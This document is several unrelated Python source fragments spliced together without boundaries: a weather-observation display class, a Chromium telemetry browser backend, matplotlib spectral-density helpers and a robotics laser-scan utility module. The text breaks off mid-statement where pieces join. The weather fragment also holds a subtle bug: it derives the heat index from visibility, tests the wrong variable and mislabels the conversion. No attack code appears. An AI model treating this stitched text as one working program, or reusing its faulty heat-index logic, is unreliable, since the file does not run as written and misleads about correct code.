self.__temperature = weather_utils.celsius_to_fahrenheit(temperature)
dewpoint = weather_obs.get("dewpoint").get("value")
if not (dewpoint is None):
self.__dewpoint = round(dewpoint, 1)
else:
self.__dewpoint = "NA"
humidity = weather_obs.get("relativeHumidity").get("value")
if not (humidity is None):
self.__humidity = round(humidity)
else:
self.__humidity = "NA"
wind_speed = weather_obs.get("windSpeed").get("value")
if not (wind_speed is None):
# Convert kph to mph
self.__wind__speed = round(wind_speed * .62137, 1)
else:
self.__wind__speed = "NA"
wind_direction = weather_obs.get("windDirection").get("value")
if not (wind_direction is None):
# Wind direction in degrees; also derive the cardinal direction
self.__degree = wind_direction
self.__wind_cardinal = weather_utils.degrees_to_cardinal(
wind_direction)
else:
self.__degree = "NA"
self.__wind_cardinal = "NA"
pressure = weather_obs.get("barometricPressure").get("value")
if not (pressure is None):
# Convert pascals to inches of mercury inHg
self.__pressure = round(pressure / 3386, 2)
else:
self.__pressure = "NA"
visibility = weather_obs.get("visibility").get("value")
if not (visibility is None):
self.__visibility = round((visibility * 3.28084) / 5280)
else:
self.__visibility = "NA"
windchill = weather_obs.get("windChill").get("value")
if not (windchill is None):
# Convert Celsius to Fahrenheit
self.__windchill = weather_utils.celsius_to_fahrenheit(windchill)
else:
self.__windchill = "NA"
heatindex = weather_obs.get("visibility").get("value")
if not (pressure is None):
# Convert meters to miles
self.__heatindex = round(heatindex * 0.000621371)
else:
self.__heatindex = "NA"
elevation = weather_obs.get("elevation").get("value")
if not (elevation is None):
# Convert meters to feet
self.__elevation = round(elevation * 3.28084)
else:
self.__elevation = "NA"
#-------------------------- DISPLAY LATEST WEATHER OBSERVATION ----------------------------#
def display_weather(self):
WIDTH = 15
print("="*self.__decorator_width)
print(f"National Weather Service Latest Weather Observations")
print(
f"Station: {self.station_id} {self.station_name} {self.__timestamp}")
print("="*self.__decorator_width)
print(f"{self.__description}")
print(f"{'Temperature:':{WIDTH}} {self.__temperature}°F")
print(f"{'Dew Point:':{WIDTH}} {self.__dewpoint}°F")
print(f"{'Humidity:':{WIDTH}} {self.__humidity}%")
print(
f"{'Wind:':{WIDTH}} {self.__wind__speed} mph {self.__degree}° {self.__wind_cardinal}")
print(f"{'Pressure:':{WIDTH}} {self.__pressure} inHg")
print(f"{'Visibility:':{WIDTH}} {self.__visibility} mi")
print(
f"{'WindChill:':{WIDTH}} {self.__windchill}°F {'Heat Index:'} {self.__heatindex}°F")
print(f"{'Elevation:':{WIDTH}} {self.__elevation} feet")
#-------------------------- GET 7 DAY FORECAST ----------------------------#
def get_forecast(self):
print("="*self.__decorator_width)
print(
f"National Weather Service 7 Day Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
# Iterate through each item in the forecast list
for forecast_item in self.forecast_list:
# start_time = forecast_item.get("startTime")
name = forecast_item.get("name")
temperature = forecast_item.get("temperature")
wind_speed = forecast_item.get("windSpeed")
wind_direction = forecast_item.get("windDirection")
short_forecast = forecast_item.get("shortForecast")
# detailed_forecast = forecast_item.get("detailedForecast")
# time = datetime.fromisoformat(start_time)
# time = time.strftime('%m-%d-%Y')
# print(f"{name}: {detailed_forecast}")
print(
f"{name:<15} {temperature:>4}°F | {wind_speed:12} {wind_direction:5} | {short_forecast}")
# print(f'{detailed_forecast}')
#-------------------------- GET 7 DAY DETAILED FORECAST ----------------------------#
def get_detailed_forecast(self):
print("="*self.__decorator_width)
print(
f"National Weather Service 7 Day Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
counter = 0
# Iterate through each item in the forecast list
for forecast_item in self.forecast_list:
# start_time = forecast_item.get("startTime")
name = forecast_item.get("name")
# temperature = forecast_item.get("temperature")
# wind_speed = forecast_item.get("windSpeed")
# wind_direction = forecast_item.get("windDirection")
# short_forecast = forecast_item.get("shortForecast")
detailed_forecast = forecast_item.get("detailedForecast")
wrapper = textwrap.TextWrapper(width=60)
detailed_forecast = wrapper.fill(text=detailed_forecast)
# time = datetime.fromisoformat(start_time)
# File: Source/chrome/tools/telemetry/telemetry/core/backends/chrome/desktop_browser_backend.py
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import glob
import heapq
import logging
import os
import os.path
import re
import shutil
import subprocess
import sys
import tempfile
import time
from telemetry.core.backends import browser_backend
from telemetry.core.backends.chrome import chrome_browser_backend
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.util import path
from telemetry.util import support_binaries
def ParseCrashpadDateTime(date_time_str):
# Python strptime does not support time zone parsing, strip it.
date_time_parts = date_time_str.split()
if len(date_time_parts) >= 3:
date_time_str = ' '.join(date_time_parts[:2])
return datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S')
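# Illustrative example with an assumed timestamp format: crashpad_database_util
# prints creation times with a trailing zone, e.g. '2015-06-01 10:20:30 UTC'.
# strptime cannot parse the zone, so the helper above drops it and returns
# datetime.datetime(2015, 6, 1, 10, 20, 30).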
class DesktopBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
"""The backend for controlling a locally-executed browser instance, on Linux,
Mac or Windows.
"""
def __init__(self, desktop_platform_backend, browser_options, executable,
flash_path, is_content_shell, browser_directory,
output_profile_path, extensions_to_load):
super(DesktopBrowserBackend, self).__init__(
desktop_platform_backend,
supports_tab_control=not is_content_shell,
supports_extensions=not is_content_shell,
browser_options=browser_options,
output_profile_path=output_profile_path,
extensions_to_load=extensions_to_load)
# Initialize fields so that an explosion during init doesn't break in Close.
self._proc = None
self._tmp_profile_dir = None
self._tmp_output_file = None
self._executable = executable
if not self._executable:
raise Exception('Cannot create browser, no executable found!')
assert not flash_path or os.path.exists(flash_path)
self._flash_path = flash_path
self._is_content_shell = is_content_shell
if len(extensions_to_load) > 0 and is_content_shell:
raise browser_backend.ExtensionsNotSupportedException(
'Content shell does not support extensions.')
self._browser_directory = browser_directory
self._port = None
self._tmp_minidump_dir = tempfile.mkdtemp()
self._crash_service = None
self._SetupProfile()
def _SetupProfile(self):
if not self.browser_options.dont_override_profile:
if self._output_profile_path:
self._tmp_profile_dir = self._output_profile_path
else:
self._tmp_profile_dir = tempfile.mkdtemp()
profile_dir = self.browser_options.profile_dir
if profile_dir:
assert self._tmp_profile_dir != profile_dir
if self._is_content_shell:
logging.critical('Profiles cannot be used with content shell')
sys.exit(1)
logging.info("Using profile directory:'%s'." % profile_dir)
shutil.rmtree(self._tmp_profile_dir)
shutil.copytree(profile_dir, self._tmp_profile_dir)
if self.browser_options.use_devtools_active_port:
# No matter whether we're using an existing profile directory or
# creating a new one, always delete the well-known file containing
# the active DevTools port number.
port_file = self._GetDevToolsActivePortPath()
if os.path.isfile(port_file):
try:
os.remove(port_file)
except Exception as e:
logging.critical('Unable to remove DevToolsActivePort file: %s' % e)
sys.exit(1)
def _GetDevToolsActivePortPath(self):
return os.path.join(self.profile_directory, 'DevToolsActivePort')
def _GetCrashServicePipeName(self):
# Ensure a unique pipe name by using the name of the temp dir.
return r'\\.\pipe\%s_service' % os.path.basename(self._tmp_minidump_dir)
def _StartCrashService(self):
os_name = self.browser.platform.GetOSName()
if os_name != 'win':
return None
arch_name = self.browser.platform.GetArchName()
command = support_binaries.FindPath('crash_service', arch_name, os_name)
if not command:
logging.warning('crash_service.exe not found for %s %s',
arch_name, os_name)
return None
return subprocess.Popen([
command,
'--no-window',
'--dumps-dir=%s' % self._tmp_minidump_dir,
'--pipe-name=%s' % self._GetCrashServicePipeName()])
def _GetCdbPath(self):
possible_paths = (
'Debugging Tools For Windows',
'Debugging Tools For Windows (x86)',
'Debugging Tools For Windows (x64)',
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x86'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x64'),
)
for possible_path in possible_paths:
app_path = os.path.join(possible_path, 'cdb.exe')
app_path = path.FindInstalledWindowsApplication(app_path)
if app_path:
return app_path
return None
def HasBrowserFinishedLaunching(self):
# In addition to the functional check performed by the base class, quickly
# check if the browser process is still alive.
if not self.IsBrowserRunning():
raise exceptions.ProcessGoneException(
"Return code: %d" % self._proc.returncode)
if self.browser_options.use_devtools_active_port:
# The Telemetry user selected the new code path to start DevTools on
# an ephemeral port. Wait for the well-known file containing the port
# number to exist.
port_file = self._GetDevToolsActivePortPath()
if not os.path.isfile(port_file):
# File isn't ready yet. Return false. Will retry.
return False
# Attempt to avoid reading the file until it's populated.
got_port = False
try:
if os.stat(port_file).st_size > 0:
with open(port_file) as f:
port_string = f.read()
self._port = int(port_string)
logging.info('Discovered ephemeral port %s' % self._port)
got_port = True
except Exception:
# Both stat and open can throw exceptions.
pass
if not got_port:
# File isn't ready yet. Return false. Will retry.
return False
return super(DesktopBrowserBackend, self).HasBrowserFinishedLaunching()
def GetBrowserStartupArgs(self):
args = super(DesktopBrowserBackend, self).GetBrowserStartupArgs()
if self.browser_options.use_devtools_active_port:
self._port = 0
else:
self._port = util.GetUnreservedAvailableLocalPort()
logging.info('Requested remote debugging port: %d' % self._port)
args.append('--remote-debugging-port=%i' % self._port)
args.append('--enable-crash-reporter-for-testing')
if not self._is_content_shell:
args.append('--window-size=1280,1024')
if self._flash_path:
args.append('--ppapi-flash-path=%s' % self._flash_path)
if not self.browser_options.dont_override_profile:
args.append('--user-data-dir=%s' % self._tmp_profile_dir)
return args
def Start(self):
assert not self._proc, 'Must call Close() before Start()'
args = [self._executable]
args.extend(self.GetBrowserStartupArgs())
if self.browser_options.startup_url:
args.append(self.browser_options.startup_url)
env = os.environ.copy()
env['CHROME_HEADLESS'] = '1' # Don't upload minidumps.
env['BREAKPAD_DUMP_LOCATION'] = self._tmp_minidump_dir
env['CHROME_BREAKPAD_PIPE_NAME'] = self._GetCrashServicePipeName()
self._crash_service = self._StartCrashService()
logging.debug('Starting Chrome %s', args)
if not self.browser_options.show_stdout:
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
self._proc = subprocess.Popen(
args, stdout=self._tmp_output_file, stderr=subprocess.STDOUT, env=env)
else:
self._proc = subprocess.Popen(args, env=env)
try:
self._WaitForBrowserToComeUp()
self._InitDevtoolsClientBackend()
if self._supports_extensions:
self._WaitForExtensionsToLoad()
except:
self.Close()
raise
@property
def pid(self):
if self._proc:
return self._proc.pid
return None
@property
def browser_directory(self):
return self._browser_directory
@property
def profile_directory(self):
return self._tmp_profile_dir
def IsBrowserRunning(self):
    return self._proc and self._proc.poll() is None
def GetStandardOutput(self):
if not self._tmp_output_file:
if self.browser_options.show_stdout:
# This can happen in the case that loading the Chrome binary fails.
# We print rather than using logging here, because that makes a
# recursive call to this function.
print >> sys.stderr, "Can't get standard output with --show-stdout"
return ''
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
def _GetMostRecentCrashpadMinidump(self):
os_name = self.browser.platform.GetOSName()
arch_name = self.browser.platform.GetArchName()
crashpad_database_util = support_binaries.FindPath(
'crashpad_database_util', arch_name, os_name)
if not crashpad_database_util:
return None
report_output = subprocess.check_output([
crashpad_database_util, '--database=' + self._tmp_minidump_dir,
'--show-pending-reports', '--show-completed-reports',
'--show-all-report-info'])
last_indentation = -1
reports_list = []
report_dict = {}
for report_line in report_output.splitlines():
# Report values are grouped together by the same indentation level.
current_indentation = 0
for report_char in report_line:
if not report_char.isspace():
break
current_indentation += 1
# Decrease in indentation level indicates a new report is being printed.
if current_indentation >= last_indentation:
report_key, report_value = report_line.split(':', 1)
if report_value:
report_dict[report_key.strip()] = report_value.strip()
elif report_dict:
try:
report_time = ParseCrashpadDateTime(report_dict['Creation time'])
report_path = report_dict['Path'].strip()
reports_list.append((report_time, report_path))
except (ValueError, KeyError) as e:
logging.warning('Crashpad report expected valid keys'
' "Path" and "Creation time": %s', e)
finally:
report_dict = {}
last_indentation = current_indentation
# Include the last report.
if report_dict:
try:
report_time = ParseCrashpadDateTime(report_dict['Creation time'])
report_path = report_dict['Path'].strip()
reports_list.append((report_time, report_path))
except (ValueError, KeyError) as e:
logging.warning('Crashpad report expected valid keys'
' "Path" and "Creation time": %s', e)
if reports_list:
_, most_recent_report_path = max(reports_list)
return most_recent_report_path
return None
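  # For reference, the loop above expects report records grouped by indentation,
  # roughly like the following (illustrative layout, not verbatim tool output):
  #
  #     <report-uuid>:
  #         Path: /tmp/<minidump-dir>/<uuid>.dmp
  #         Creation time: 2015-06-01 10:20:30 UTC
  #
  # A drop back to a shallower indentation marks the start of the next report.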
def _GetMostRecentMinidump(self):
# Crashpad dump layout will be the standard eventually, check it first.
most_recent_dump = self._GetMostRecentCrashpadMinidump()
# Typical breakpad format is simply dump files in a folder.
if not most_recent_dump:
dumps = glob.glob(os.path.join(self._tmp_minidump_dir, '*.dmp'))
if dumps:
most_recent_dump = heapq.nlargest(1, dumps, os.path.getmtime)[0]
# As a sanity check, make sure the crash dump is recent.
if (most_recent_dump and
os.path.getmtime(most_recent_dump) < (time.time() - (5 * 60))):
logging.warning('Crash dump is older than 5 minutes. May not be correct.')
return most_recent_dump
def _IsExecutableStripped(self):
if self.browser.platform.GetOSName() == 'mac':
symbols = subprocess.check_output(['/usr/bin/nm', self._executable])
num_symbols = len(symbols.splitlines())
# We assume that if there are more than 10 symbols the executable is not
# stripped.
return num_symbols < 10
else:
return False
def _GetStackFromMinidump(self, minidump):
os_name = self.browser.platform.GetOSName()
if os_name == 'win':
cdb = self._GetCdbPath()
if not cdb:
logging.warning('cdb.exe not found.')
return None
output = subprocess.check_output([cdb, '-y', self._browser_directory,
'-c', '.ecxr;k30;q', '-z', minidump])
# cdb output can start the stack with "ChildEBP", "Child-SP", and possibly
# other things we haven't seen yet. If we can't find the start of the
# stack, include output from the beginning.
stack_start = 0
stack_start_match = re.search("^Child(?:EBP|-SP)", output, re.MULTILINE)
if stack_start_match:
stack_start = stack_start_match.start()
stack_end = output.find('quit:')
return output[stack_start:stack_end]
arch_name = self.browser.platform.GetArchName()
stackwalk = support_binaries.FindPath(
'minidump_stackwalk', arch_name, os_name)
if not stackwalk:
logging.warning('minidump_stackwalk binary not found.')
return None
with open(minidump, 'rb') as infile:
minidump += '.stripped'
with open(minidump, 'wb') as outfile:
outfile.write(''.join(infile.read().partition('MDMP')[1:]))
symbols_path = os.path.join(self._tmp_minidump_dir, 'symbols')
symbols = glob.glob(os.path.join(self._browser_directory, '*.breakpad*'))
if symbols:
for symbol in sorted(symbols, key=os.path.getmtime, reverse=True):
if not os.path.isfile(symbol):
continue
with open(symbol, 'r') as f:
fields = f.readline().split()
if not fields:
continue
sha = fields[3]
binary = ' '.join(fields[4:])
symbol_path = os.path.join(symbols_path, binary, sha)
if os.path.exists(symbol_path):
continue
os.makedirs(symbol_path)
shutil.copyfile(symbol, os.path.join(symbol_path, binary + '.sym'))
else:
# On some platforms generating the symbol table can be very time
# consuming, skip it if there's nothing to dump.
if self._IsExecutableStripped():
logging.info('%s appears to be stripped, skipping symbol dump.' % (
self._executable))
return
logging.info('Dumping breakpad symbols.')
generate_breakpad_symbols_path = os.path.join(
util.GetChromiumSrcDir(), "components", "crash",
"tools", "generate_breakpad_symbols.py")
cmd = [
sys.executable,
generate_breakpad_symbols_path,
'--binary=%s' % self._executable,
'--symbols-dir=%s' % symbols_path,
'--build-dir=%s' % self._browser_directory,
]
try:
subprocess.check_output(cmd, stderr=open(os.devnull, 'w'))
except subprocess.CalledProcessError:
        logging.warning('Failed to execute "%s"' % ' '.join(cmd))
(pad_to - 1)//2 + 1
else:
freqcenter = pad_to//2
scaling_factor = 1.
elif sides == 'onesided':
if pad_to % 2:
numFreqs = (pad_to + 1)//2
else:
numFreqs = pad_to//2 + 1
scaling_factor = 2.
if not np.iterable(window):
window = window(np.ones(NFFT, x.dtype))
if len(window) != NFFT:
raise ValueError(
"The window length must match the data's first dimension")
result = stride_windows(x, NFFT, noverlap, axis=0)
result = detrend(result, detrend_func, axis=0)
result = result * window.reshape((-1, 1))
result = np.fft.fft(result, n=pad_to, axis=0)[:numFreqs, :]
freqs = np.fft.fftfreq(pad_to, 1/Fs)[:numFreqs]
if not same_data:
# if same_data is False, mode must be 'psd'
resultY = stride_windows(y, NFFT, noverlap)
resultY = detrend(resultY, detrend_func, axis=0)
resultY = resultY * window.reshape((-1, 1))
resultY = np.fft.fft(resultY, n=pad_to, axis=0)[:numFreqs, :]
result = np.conj(result) * resultY
elif mode == 'psd':
result = np.conj(result) * result
elif mode == 'magnitude':
result = np.abs(result) / np.abs(window).sum()
elif mode == 'angle' or mode == 'phase':
# we unwrap the phase later to handle the onesided vs. twosided case
result = np.angle(result)
elif mode == 'complex':
result /= np.abs(window).sum()
if mode == 'psd':
# Also include scaling factors for one-sided densities and dividing by
# the sampling frequency, if desired. Scale everything, except the DC
# component and the NFFT/2 component:
        # if we have an even number of frequencies, don't scale NFFT/2
if not NFFT % 2:
slc = slice(1, -1, None)
# if we have an odd number, just don't scale DC
else:
slc = slice(1, None, None)
result[slc] *= scaling_factor
# MATLAB divides by the sampling frequency so that density function
# has units of dB/Hz and can be integrated by the plotted frequency
# values. Perform the same scaling here.
if scale_by_freq:
result /= Fs
# Scale the spectrum by the norm of the window to compensate for
# windowing loss; see Bendat & Piersol Sec 11.5.2.
result /= (np.abs(window)**2).sum()
else:
# In this case, preserve power in the segment, not amplitude
result /= np.abs(window).sum()**2
t = np.arange(NFFT/2, len(x) - NFFT/2 + 1, NFFT - noverlap)/Fs
if sides == 'twosided':
# center the frequency range at zero
freqs = np.roll(freqs, -freqcenter, axis=0)
result = np.roll(result, -freqcenter, axis=0)
elif not pad_to % 2:
# get the last value correctly, it is negative otherwise
freqs[-1] *= -1
# we unwrap the phase here to handle the onesided vs. twosided case
if mode == 'phase':
result = np.unwrap(result, axis=0)
return result, freqs, t
def _single_spectrum_helper(
mode, x, Fs=None, window=None, pad_to=None, sides=None):
"""
Private helper implementing the commonality between the complex, magnitude,
angle, and phase spectrums.
"""
_api.check_in_list(['complex', 'magnitude', 'angle', 'phase'], mode=mode)
if pad_to is None:
pad_to = len(x)
spec, freqs, _ = _spectral_helper(x=x, y=None, NFFT=len(x), Fs=Fs,
detrend_func=detrend_none, window=window,
noverlap=0, pad_to=pad_to,
sides=sides,
scale_by_freq=False,
mode=mode)
if mode != 'complex':
spec = spec.real
if spec.ndim == 2 and spec.shape[1] == 1:
spec = spec[:, 0]
return spec, freqs
# Split out these keyword docs so that they can be used elsewhere
docstring.interpd.update(
Spectral="""\
Fs : float, default: 2
The sampling frequency (samples per time unit). It is used to calculate
the Fourier frequencies, *freqs*, in cycles per time unit.
window : callable or ndarray, default: `.window_hanning`
A function or a vector of length *NFFT*. To create window vectors see
`.window_hanning`, `.window_none`, `numpy.blackman`, `numpy.hamming`,
`numpy.bartlett`, `scipy.signal`, `scipy.signal.get_window`, etc. If a
function is passed as the argument, it must take a data segment as an
argument and return the windowed version of the segment.
sides : {'default', 'onesided', 'twosided'}, optional
Which sides of the spectrum to return. 'default' is one-sided for real
data and two-sided for complex data. 'onesided' forces the return of a
one-sided spectrum, while 'twosided' forces two-sided.""",
Single_Spectrum="""\
pad_to : int, optional
The number of points to which the data segment is padded when performing
the FFT. While not increasing the actual resolution of the spectrum (the
minimum distance between resolvable peaks), this can give more points in
the plot, allowing for more detail. This corresponds to the *n* parameter
in the call to fft(). The default is None, which sets *pad_to* equal to
the length of the input signal (i.e. no padding).""",
PSD="""\
pad_to : int, optional
The number of points to which the data segment is padded when performing
the FFT. This can be different from *NFFT*, which specifies the number
of data points used. While not increasing the actual resolution of the
spectrum (the minimum distance between resolvable peaks), this can give
more points in the plot, allowing for more detail. This corresponds to
the *n* parameter in the call to fft(). The default is None, which sets
*pad_to* equal to *NFFT*
NFFT : int, default: 256
    The number of data points used in each block for the FFT. A power of 2 is
most efficient. This should *NOT* be used to get zero padding, or the
scaling of the result will be incorrect; use *pad_to* for this instead.
detrend : {'none', 'mean', 'linear'} or callable, default: 'none'
The function applied to each segment before fft-ing, designed to remove
the mean or linear trend. Unlike in MATLAB, where the *detrend* parameter
    is a vector, in Matplotlib it is a function. The :mod:`~matplotlib.mlab`
module defines `.detrend_none`, `.detrend_mean`, and `.detrend_linear`,
but you can use a custom function as well. You can also use a string to
choose one of the functions: 'none' calls `.detrend_none`. 'mean' calls
`.detrend_mean`. 'linear' calls `.detrend_linear`.
scale_by_freq : bool, default: True
Whether the resulting density values should be scaled by the scaling
frequency, which gives density in units of Hz^-1. This allows for
integration over the returned frequency values. The default is True for
MATLAB compatibility.""")
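# For orientation, the density scaling implemented in _spectral_helper (assuming a
# one-sided spectrum with scale_by_freq=True, following Bendat & Piersol) reduces to
#
#     Pxx[k] = 2 * |FFT(window * segment)[k]|**2 / (Fs * sum(abs(window)**2))
#
# with the factor of 2 omitted for the DC bin and, when NFFT is even, the Nyquist bin.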
@docstring.dedent_interpd
def psd(x, NFFT=None, Fs=None, detrend=None, window=None,
noverlap=None, pad_to=None, sides=None, scale_by_freq=None):
r"""
Compute the power spectral density.
The power spectral density :math:`P_{xx}` by Welch's average
periodogram method. The vector *x* is divided into *NFFT* length
segments. Each segment is detrended by function *detrend* and
windowed by function *window*. *noverlap* gives the length of
the overlap between segments. The :math:`|\mathrm{fft}(i)|^2`
of each segment :math:`i` are averaged to compute :math:`P_{xx}`.
If len(*x*) < *NFFT*, it will be zero padded to *NFFT*.
Parameters
----------
x : 1-D array or sequence
Array or sequence containing the data
%(Spectral)s
%(PSD)s
noverlap : int, default: 0 (no overlap)
The number of points of overlap between segments.
Returns
-------
Pxx : 1-D array
The values for the power spectrum :math:`P_{xx}` (real valued)
freqs : 1-D array
The frequencies corresponding to the elements in *Pxx*
References
----------
    Bendat & Piersol -- Random Data: Analysis and Measurement Procedures, John
Wiley & Sons (1986)
See Also
--------
specgram
`specgram` differs in the default overlap; in not returning the mean of
the segment periodograms; and in returning the times of the segments.
magnitude_spectrum : returns the magnitude spectrum.
csd : returns the spectral density between two signals.
"""
Pxx, freqs = csd(x=x, y=None, NFFT=NFFT, Fs=Fs, detrend=detrend,
window=window, noverlap=noverlap, pad_to=pad_to,
sides=sides, scale_by_freq=scale_by_freq)
return Pxx.real, freqs
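# Minimal usage sketch (illustrative values, not part of the module): estimate the
# PSD of a noisy 50 Hz sine sampled at 1 kHz and locate its spectral peak.
#
#     fs = 1000.0
#     t = np.arange(0, 1, 1 / fs)
#     x = np.sin(2 * np.pi * 50 * t) + 0.1 * np.random.randn(t.size)
#     Pxx, freqs = psd(x, NFFT=256, Fs=fs, noverlap=128)
#     peak = freqs[np.argmax(Pxx)]   # expected to land near 50 Hz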
@docstring.dedent_interpd
def csd(x, y, NFFT=None, Fs=None, detrend=None, window=None,
noverlap=None, pad_to=None, sides=None, scale_by_freq=None):
"""
Compute the cross-spectral density.
The cross spectral density :math:`P_{xy}` by Welch's average
periodogram method. The vectors *x* and *y* are divided into
*NFFT* length segments. Each segment is detrended by function
*detrend* and windowed by function *window*. *noverlap* gives
the length of the overlap between segments. The product of
the direct FFTs of *x* and *y* are averaged over each segment
to compute :math:`P_{xy}`, with a scaling to correct for power
loss due to windowing.
If len(*x*) < *NFFT* or len(*y*) < *NFFT*, they will be zero
padded to *NFFT*.
Parameters
----------
x, y : 1-D arrays or sequences
Arrays or sequences containing the data
%(Spectral)s
%(PSD)s
noverlap : int, default: 0 (no overlap)
The number of points of overlap between segments.
Returns
-------
Pxy : 1-D array
The values for the cross spectrum :math:`P_{xy}` before scaling (real
valued)
freqs : 1-D array
    The frequencies corresponding to the elements in *Pxy*
import glob
import json
import os.path
import math
from functools import reduce
from typing import Union
from collections.abc import Iterable
from datetime import datetime
import numpy as np
import scipy.interpolate
from matplotlib import transforms, rcParams
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle, Ellipse
from matplotlib.widgets import Button
import seaborn as sns
import pint
from icecream import ic
from scripts.data_path import *
rcParams['figure.constrained_layout.use'] = True
rcParams['figure.dpi'] = 100
rcParams['font.size'] = 12
sns.set_style('darkgrid')
inf = float('inf')
reg = pint.UnitRegistry()
def unit_converter(m, src=reg.inch, dst=reg.meter):
return (m * src).to(dst).magnitude
def json_load(fnm):
f = open(fnm, 'r')
scans = json.load(f)
f.close()
return scans
def now(as_str=True):
d = datetime.now()
return d.strftime('%Y-%m-%d %H:%M:%S') if as_str else d
def get(dic, ks):
    # return reduce(lambda acc, elm: acc[elm], keys, dic)
    # Walk a dot-separated key path; stop with None once any key along the path is missing
    return reduce(lambda acc, elm: acc[elm] if isinstance(acc, dict) and elm in acc else None, ks.split('.'), dic)
def config(attr):
"""
Retrieves the queried attribute value from the config file.
Loads the config file on first call.
"""
if not hasattr(config, 'config'):
with open(f'{PATH_BASE}/{DIR_PROJ}/config.json') as f:
config.config = json.load(f)
return get(config.config, attr)
# ic('here', attr)
# if isinstance(ret, dict) and list(ret.keys())[0].isdigit(): # For JSON write
# ic('here')
# ret = {int(k): v for k, v in ret.items()}
# return ret
def eg_hsr_scan(k1=0, k2=77):
"""
:return: Example HSR laser scan as 2D coordinates, given file name and measurement number
"""
path = os.path.join(PATH_BASE, DIR_DATA)
fls = sorted(glob.iglob(f'{path}/{config(f"{DIR_DATA}.eg.HSR.fmt")}', recursive=True))
hsr_scans = json_load(fls[k1])
s = hsr_scans[k2]
return laser_polar2planar(s['angle_max'], s['angle_min'])(np.array(s['ranges']))
def pts2max_dist(pts):
"""
:param pts: List of 2d points
:return: The maximum distance between any two pairs of points
"""
assert pts.shape[1] == 2
def dist(a, b):
return (a[0] - b[0])**2 + (a[1] - b[1])**2
n = pts.shape[0]
idxs = ((i, j) for i in range(n-1) for j in range(i, n))
# ic(list(idxs))
return math.sqrt(max(dist(pts[a], pts[b]) for a, b in idxs))
def clipper(low, high):
"""
:return: A clipping function for range [low, high]
"""
return lambda x: max(min(x, high), low)
def get_3rd_side(a, b):
"""
Returns hypotenuse of a right-angled triangle, given its other sides
"""
# return np.sqrt(np.sum(np.square(mags)))
return math.sqrt(a**2 + b**2)
class JsonWriter:
"""
Each time the object is called, the data is appended to the end of a list which is serialized to a JSON file
"""
def __init__(self, fnm):
self.fnm = fnm
self.data = []
self.fnm_ext = f'data/{self.fnm}.json'
open(self.fnm_ext, 'a').close() # Create file in OS
    def __call__(self, data):
        self.data.append(data)
        # Re-serialize the whole accumulated list so the file always holds valid JSON
        with open(self.fnm_ext, 'w') as f:
            json.dump(self.data, f, indent=4)
# ic(self.data)
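# Minimal usage sketch for JsonWriter (file name is illustrative):
#
#     writer = JsonWriter('hsr_scans')          # writes to data/hsr_scans.json
#     writer(dict(seq=0, ranges=[1.0, 2.0]))    # file now holds a one-element list
#     writer(dict(seq=1, ranges=[1.1, 2.1]))    # file rewritten with both entries
#
# Note that the whole accumulated list is re-serialized on every call.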
def laser_scan2dict(data):
"""
:param data: Of type [sensor_msgs/LaserScan](https://docs.ros.org/en/noetic/api/sensor_msgs/html/msg/LaserScan.html)
"""
h = data.header
d_h = dict(
seq=h.seq,
stamp=dict(
secs=h.stamp.secs,
nsecs=h.stamp.nsecs
),
frame_id=h.frame_id
)
return dict(
header=d_h,
angle_min=data.angle_min,
angle_max=data.angle_max,
angle_increment=data.angle_increment,
time_increment=data.time_increment,
scan_time=data.scan_time,
range_min=data.range_min,
ranges=data.ranges,
intensities=data.intensities
)
def extend_1s(arr):
"""
Return array with column of 1's appended
:param arr: 2D array
"""
return np.hstack([arr, np.ones([arr.shape[0], 1])])
def cartesian(arrs: list, out=None):
"""
:param arrs: list of 1D arrays
:param out: Array to place the cartesian product in.
:return: Cartesian product of `arrs` of shape
Modified from https://stackoverflow.com/a/1235363/10732321
"""
arrs = [np.asarray(x) for x in arrs]
n = np.prod([x.size for x in arrs])
if out is None:
out = np.zeros([n, len(arrs)], dtype=arrs[0].dtype)
m = int(n / arrs[0].size)
out[:, 0] = np.repeat(arrs[0], m)
if arrs[1:]:
cartesian(arrs[1:], out=out[0:m, 1:])
for j in range(1, arrs[0].size):
out[j*m:(j+1)*m, 1:] = out[0:m, 1:]
return out
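# Example (illustrative): cartesian([[1, 2], [4, 5]]) returns
#
#     array([[1, 4],
#            [1, 5],
#            [2, 4],
#            [2, 5]])
#
# i.e. one row per combination, taking one element from each input array.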
def polar2planar(dist, angle):
return (
dist * np.cos(angle),
dist * np.sin(angle)
)
def laser_polar2planar(a_max, a_min, split=False):
"""
:param a_max: Maximum angle
:param a_min: Minimum angle
:param split: If True, the function returns a 2-tuple of x and y coordinates
:return: A function that returns an array of 2D points
Assumes the angles are [a_min, a_max)
"""
def _get(ranges):
"""
:param ranges: Array of laser scan ranges
Number of beams taken from size of `range`;
"""
theta = np.linspace(a_min, a_max, num=ranges.size + 1)[:-1]
x, y = polar2planar(ranges, theta)
return (x, y) if split else np.vstack([x, y]).T
return _get
def rot_mat(theta):
c, s = np.cos(theta), np.sin(theta)
return np.array([
[c, -s],
[s, c]
])
def tsl_n_angle2tsf(tsl: Iterable = np.array([0, 0]), theta: Union[int, float] = 0):
"""
Converts translation in 2D & an angle into matrix transformation
:param tsl: 3-array of (translation_x, translation_y, theta),
or 2-array of (translation_x, translation_y)
:param theta: Angle in radians
"""
tsl = np.asarray(tsl)
tsf = np.identity(3)
tsf[:2, 2] = tsl[:2]
# ic(tsl[-1] if tsl.size == 3 else theta)
tsf[:2, :2] = rot_mat(tsl[-1] if tsl.size == 3 else theta)
return tsf
def tsf2tsl_n_angle(tsf):
"""
:return: 2-tuple of 2D translation and angle in radians from transformation matrix
"""
    # atan2 recovers the signed angle; acos of the first element would lose the sign
    return tsf[:2, 2], math.atan2(tsf[1][0], tsf[0][0])
